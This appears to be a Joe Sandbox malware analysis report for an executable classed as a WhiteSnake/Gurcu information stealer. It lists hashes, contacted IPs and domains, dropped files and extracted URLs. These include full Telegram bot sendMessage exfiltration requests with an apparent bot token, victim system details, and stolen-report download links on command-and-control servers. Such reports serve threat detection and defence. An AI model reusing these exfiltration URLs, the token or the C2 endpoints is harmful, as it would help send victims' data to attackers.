Joe Sandbox Cloud Basic

Want to search on specific fields?


Try our:

Advanced Search

Want to search in depth on all Cloud Basic reports?

Try: Joe Sandbox View

Register Login
sloganpng
top title background image
flash

jqOHOuPMJP.exe

Status: finished
Submission Time: 2024-02-10 16:16:06 +01:00
Malicious
Trojan
Spyware
Evader
Gurcu Stealer, WhiteSnake Stealer

Comments

Tags

  • exe
  • WhiteSnakeStealer

Details

  • Analysis ID:
    1390172
  • API (Web) ID:
    1390172
  • Original Filename:
    7e9a93c69aecfc2bbda9470fbd4556db.exe
  • Analysis Started:
    2024-02-10 16:16:06 +01:00
  • Analysis Finished:
    2024-02-10 16:28:33 +01:00
  • MD5:
    7e9a93c69aecfc2bbda9470fbd4556db
  • SHA1:
    ab0e810472a897affac1a761b49595939f6897a9
  • SHA256:
    82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
  • Technologies:

Joe Sandbox

Engine Download Report Detection Info
malicious
Full Report Management Report IOC Report
malicious
Score: 100
System: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01

Third Party Analysis Engines

Open Full Report
malicious
Score: 17/70
malicious
Score: 5/38
malicious

IPs

IP Country Detection
82.147.85.194
 Russian Federation
208.95.112.1
 United States
149.154.167.220
 United Kingdom
Click to see the 2 hidden entries
138.68.79.95
 United States
185.119.118.59
 Austria

Domains

Name IP Detection
serveo.net
 138.68.79.95
ip-api.com
 208.95.112.1
api.telegram.org
 149.154.167.220

URLs

Name Detection
http://pesterbdd.com/images/Pester.png
https://api.tele
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
Click to see the 95 hidden entries
http://185.217.98.121:8080
https://contoso.com/
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
http://18.228.80.130:80
http://www.w3.
https://164.90.185.9:443
http://104.248.208.221:80
https://44.228.161.50:443
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
http://nuget.org/NuGet.exe
https://contoso.com/License
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
https://api.telegram.org
http://185.217.98.121:80
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
http://212.6.44.53:8080
http://154.26.128.6:80
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
http://api.telegram.org
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
http://45.61.136.13:80
http://82.147.85.194
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
http://crl.v
http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
https://support.mozilla.org
http://127.0.0.1:18772/handleOpenWSR?r=
http://206.189.109.146:80
http://116.202.101.219:8080
https://ac.ecosia.org/autocomplete?q=
https://185.217.98.121:443
https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
http://185.119.118.59:8080/hkLYW_user
http://149.88.44.159:80
http://127.0.0.1:6787/ing=no
http://upx.sf.net
http://82.147.85.194/byte/
https://18.178.28.151:443
http://pesterbdd.com/i?
http://144.126.132.141:8080
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
https://e483612b93e055308d0c85f365c474ee.serveo.net
https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
http://193.142.58.127:80Pk
http://185.119.118.59:80802
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
http://ip-api.com
https://nuget.org/nuget.exe
http://66.42.56.128:80
https://aka.ms/pscore6lB
http://ip-api.com/line?fields=query,country
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
https://e483612b93e055308d0c85f365c474ee.serveo.net/
https://192.99.196.191:443
https://13.231.21.109:443
http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
https://64.227.21.98:443
http://107.161.20.142:8080
http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
http://185.119.118.59:8080
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
https://e2111f95f52ba8be6b2d3394e38b1722.se
https://api.telegram.org/bot
http://23.224.102.6:8001
https://duckduckgo.com/ac/?q=
https://duckduckgo.com/chrome_newtab
http://216.250.190.139:80
http://www.microsoft.co(=
http://23.248.176.37:180
http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
http://schemas.xmlsoap.org/wsdl/
http://45.61.136.52:80
http://127.0.0.1:
http://185.119.118.59
https://github.com/Pester/Pester
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
https://www.ecosia.org/newtab/
http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
http://ip-api.com/line?fields=query
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
http://193.142.58.127:80
http://82.147.85.194/byte/@jokerbot880901.txt
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
https://contoso.com/Icon
http://www.apache.org/licenses/LICENSE-2.0.html
http://schemas.xmlsoap.org/soap/encoding/
http://82.147.85
http://127.0.0.1:6787/
http://129.151.109.160:8080
http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
http://185.119.118.59:8080/get
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Dropped files

Name File Type Hashes Detection
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
 PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
 #
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
 PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
 #